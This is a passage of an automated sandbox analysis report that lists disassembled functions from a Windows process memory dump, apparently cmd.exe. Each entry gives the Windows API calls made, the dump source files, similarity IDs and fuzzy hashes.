                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7218E75F002319BCB289B1DAC557BFBAE9EF85354F614099F845A7240EB70CD41C260
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00019E09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019E8E: iswspace.MSVCRT ref: 00019E9E
                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT ref: 00019E28
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00019E79
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswspace$_wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: off
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3989682491-733764931
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f53d21ec575a20f9f2d6f37668a41cf6a7fdcdf01b066001f67f2fffd5e9347f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9ff46dc40f2f12ed7b5336f56270bad18ed8339419090eaeaa0f2128361e23c5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f53d21ec575a20f9f2d6f37668a41cf6a7fdcdf01b066001f67f2fffd5e9347f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6411082570431196FB74A2A8EC3ABFF52D59BC1B55F29002DF90AE70C1EA45DDC191A1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00035166 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002727B: __iob_func.MSVCRT ref: 00027280
                                                                                                                                                                                                                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 00035182
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: __iob_funcfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 620453056-2781220306
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b7148f8eaba59dec2128fcc53419c6409c2a859a73cae353456f77694237e68e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 15f06460da258734f3f8238c9b8231c465a8e4f6f9dea131e5cbdee51df3a1d6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7148f8eaba59dec2128fcc53419c6409c2a859a73cae353456f77694237e68e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F01FE37A44B129AD7352B5CBC16AF373ECEBD0312B15052BED4A93150F6705D828180
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00033500 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 0003351B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 0003352C
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-582119455
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 60917fc571e630a80730469110cf874acd17feaa95a005349fd2a848715d2c7c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8487e7a651e64debd719a6b488ce7bba6c75bd0d2abba05da5c45717408f6b77
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60917fc571e630a80730469110cf874acd17feaa95a005349fd2a848715d2c7c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01E09231B02B308BABA25B35FD0859B3BD8E746B627011251E909E3290D6388D418ED1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000338F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 000338FB
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00033907
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-919018592
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 676aa0aebdc2b5b6c4e1999d67409793328e7c4ee1a386cb09c4d5548574a1b6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b525f6baab94bd9cd8fe917e9774f01b390c64cc508a85efd9ad26ddea862aad
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 676aa0aebdc2b5b6c4e1999d67409793328e7c4ee1a386cb09c4d5548574a1b6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06E0EC72641729BBCB211FA5DC0DC8BBF19EB457B2B004121FA09961608A7A8950DAA1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000252F5 Relevance: 6.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002539E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9), ref: 000254C6
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00058BF0,00000000,?), ref: 00018EC3
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$CurrentDirectory
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 168429351-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: eb22fac12c496d80c15be34852d8eab696bb743c63b83c4c5df0fe95da092572
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8b19a5d1a3db8311d87e829a779f45bad5d91b6255e24646187018e7511d19fa
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb22fac12c496d80c15be34852d8eab696bb743c63b83c4c5df0fe95da092572
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D618871A0C3519FD368DF28E8856ABF7E4BF88305F10492EF589C7251DB749884CB86
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001AA75 Relevance: 6.2, APIs: 4, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmp$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3270668897-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 78924f9d6d1086add0a59b0a114ac4059653c93810a291480e5186fe32a58cd7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6978875b05ab564c70541ead1247a9357ac002d7403b42f076430ea5a9e6004d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78924f9d6d1086add0a59b0a114ac4059653c93810a291480e5186fe32a58cd7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27516C357042659BEB65EB68A851EBE73E5FF85704F14401DE8439B1C2EBB04EC2C392
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001DED0 Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3849470556-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 703c7efca548d39c57d174f554570047c44366235357c36df007c6ff532ba77f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b7f72da58e5c60a9c416956cceb320edbb01f9c3a5ab8930036ea43d90bc925c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 703c7efca548d39c57d174f554570047c44366235357c36df007c6ff532ba77f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB51E174A042009BDB659F58D8446FEB7F5BB84301F2481ABEC0287291E775DEC2DB82
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00021CD5 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D3A
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D44
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D57
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D61
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$FullNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 268959451-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5b43d7b4217938bc2310c7abac87f67154184b361b7335ea62cb7c1d67331bc5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4126779c388bac4f910a38f611600d3a2847ca241b1ae1af0eb919eaa03fede0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b43d7b4217938bc2310c7abac87f67154184b361b7335ea62cb7c1d67331bc5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25315B39200212EBCB38DF68D8959BFB3F5EF84304724862DEA06C7291E7B5AE41C750
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001C570 Relevance: 6.1, APIs: 4, Instructions: 101memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0001C5BD
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 0001C5C4
                                                                                                                                                                                                                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 0001C630
                                                                                                                                                                                                                                                                                                                                                                                                                          • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 0001C69D
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FreeHeap$ProcessVirtual_setjmp3
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2613391085-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b4db8fbf115749227b428af01d9f1a375a9ac5d461303c7e9fb79f62839c5472
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 486eeec1b1791ef465a0ce79d61dd3d167b33845113a50a018777bf517029aa3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4db8fbf115749227b428af01d9f1a375a9ac5d461303c7e9fb79f62839c5472
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4318EB4B447108BFB50DF68E944BAA77F5F746705F10402AE809C7251E77ADC848B9A
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000363F3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,?,?,0002BFD6,?,?,?,?,?,?,?,?), ref: 000364D4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000272EF: ApiSetQueryApiSetPresence.API-MS-WIN-CORE-APIQUERY-L1-1-0(00011028,?,?,?,0002F12E,0003CA50,00000018,00021E7C,00000000,00000000,0002ACE0,00000000,00000000,?,00000104,?), ref: 00027314
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,0002BFD6), ref: 0003646C
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,0002BFD6), ref: 00036474
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,0002BFD6), ref: 000364B6
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorHeapMode$AllocByteCharMultiPresenceProcessQueryWidelongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 129137517-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4bc08eeea67053ce3228b82c33c9d9beac36f37b240d4bdd14a74c60e0f7ea1d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1b8c344f2a3832a85ce01c4c8b3750f15bc002bca9b07a4f942c8282958d59b7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc08eeea67053ce3228b82c33c9d9beac36f37b240d4bdd14a74c60e0f7ea1d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82213B317003117BDB25AFB89C959FF379EDFC1311B048629F90687282EE799C45C2A1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000362B3 Relevance: 6.1, APIs: 4, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,0003CD20,0000001C,000358DF), ref: 000362E6
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,0003CD20,0000001C,000358DF), ref: 00036301
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 00036340
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0003635D
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
